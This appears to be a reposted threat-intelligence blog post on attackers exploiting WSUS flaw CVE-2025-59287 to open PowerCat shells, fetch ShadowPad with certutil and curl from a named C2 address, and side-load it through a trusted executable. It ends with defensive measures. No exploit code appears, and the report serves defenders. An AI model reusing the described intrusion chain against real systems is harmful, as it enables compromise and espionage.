ShadowPad Slips Through WSUS: Inside a Server-Side Backdoor Operation
- Javier Conejo del Cerro
- hace 9 horas
- 2 Min. de lectura
A recently patched flaw inside Microsoft WSUS, CVE-2025-59287, has become the centerpiece of a new wave of intrusions in which threat actors weaponize a deserialization vulnerability to obtain full system-level access. By targeting Internet-exposed WSUS servers, attackers leveraged the vulnerability to execute commands, open remote shells through PowerCat, and silently install ShadowPad, one of the most advanced modular backdoors historically tied to Chinese state-sponsored espionage. The attack demonstrates once again how a single unpatched component in the update supply chain can become a direct route to system compromise, persistence, and long-term clandestine operations.
Phase 1 — Initial Access: Exploiting the WSUS Flaw
The intrusion begins with the exploitation of CVE-2025-59287, a critical deserialization vulnerability in WSUS that grants remote code execution with system privileges. Public proof-of-concept exploit code made weaponization trivial, allowing threat actors to scan for exposed WSUS instances and instantly obtain privileged access. Once inside, the attackers launched PowerCat, an open-source PowerShell-based Netcat tool, creating an interactive system shell that provided full control over the Windows Server environment. With elevated privileges secured, the foundation for transitioning to a multi-stage infection chain was established.
Phase 2 — Delivery & Installation: ShadowPad Enters the System
Using built-in Windows utilities such as certutil.exe and curl.exe, the attackers downloaded the ShadowPad payload directly from their command-and-control server (149.28.78[.]189:42306). This technique allowed them to bypass traditional security controls by blending malicious traffic with legitimate administrative tools. Once downloaded, ShadowPad was deployed using DLL side-loading, abusing a trusted executable (ETDCtrlHelper.exe) to load a malicious DLL (ETDApix.dll). This gave them a memory-resident loader capable of executing the backdoor without leaving obvious traces on disk, ensuring persistence and stealth.
Phase 3 — Backdoor Activation & Silent Operation
Once active, ShadowPad initialized its core engine and began loading extended modules directly into memory. These plugins include capabilities for reconnaissance, command execution, persistence, and evasion. The malware’s architecture allows operators to expand functionality over time, making ShadowPad an adaptable platform for long-term espionage inside any breached network. Although ShadowPad is historically linked to Chinese state-sponsored groups, this specific operation has not been attributed to a known cluster—but the sophistication and tooling align with well-resourced actors.
This breach illustrates a fundamental risk within enterprise environments: update and management servers are high-value targets, and even a single vulnerability in WSUS can provide full system takeover. The weaponization of a public PoC, rapid exploitation, and deployment of ShadowPad highlight how swiftly threat actors move to operationalize newly patched flaws. Organizations must recognize that patching, hardening administrative interfaces, and restricting exposure of update infrastructure are essential steps to prevent system-level compromise. ShadowPad’s stealth, modularity, and use of legitimate Windows tools underscore the urgent need for proactive defense against supply-chain and server-side vulnerabilities.
Measures to Fend Off the Attack
Patch WSUS immediately and verify installation of the CVE-2025-59287 fix.
Remove WSUS from direct Internet exposure; place it behind VPN or zero-trust access.
Block or restrict misuse of built-in dual-use tools (curl, certutil, PowerShell).
Harden against DLL side-loading by enforcing code integrity and application control.
Enable PowerShell Constrained Language Mode for non-admin contexts.
Monitor for PoC-derived exploit traffic and suspicious access attempts to WSUS endpoints.
Use EDR/XDR capable of detecting ShadowPad’s modular behavior, memory-resident loading, and anomalous plugin activity.
The Hacker News
Comentarios